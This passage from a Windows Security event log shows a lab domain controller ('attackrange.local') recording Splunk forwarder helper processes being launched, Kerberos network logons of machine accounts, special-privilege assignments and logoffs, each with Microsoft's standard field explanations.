Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:31:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263844
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x618
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:31:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263846
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x5e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:31:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263847
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x76FA26
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53145
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:31:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263848
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1848
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:31:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263850
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1808
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:31:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263849
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10cc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:31:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263852
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x770E30
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51584
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:31:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263851
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x770E30
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:31:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263853
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x76FA26
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:31:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263854
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x770E30
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:31:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263857
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x771BF2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:31:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263856
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x771BF2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51593
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:31:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263855
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x771BF2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:32:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263858
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1514
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:32:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263860
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:32:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263859
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:32:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263861
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1880
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:32:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263862
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe74
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:32:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263864
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1830
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:32:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263863
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x754
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:32:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263870
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x774B0E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:32:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263869
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x774B0E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51600
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:32:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263868
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x774B0E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:32:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263867
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x774AA2
Logon Type: 3
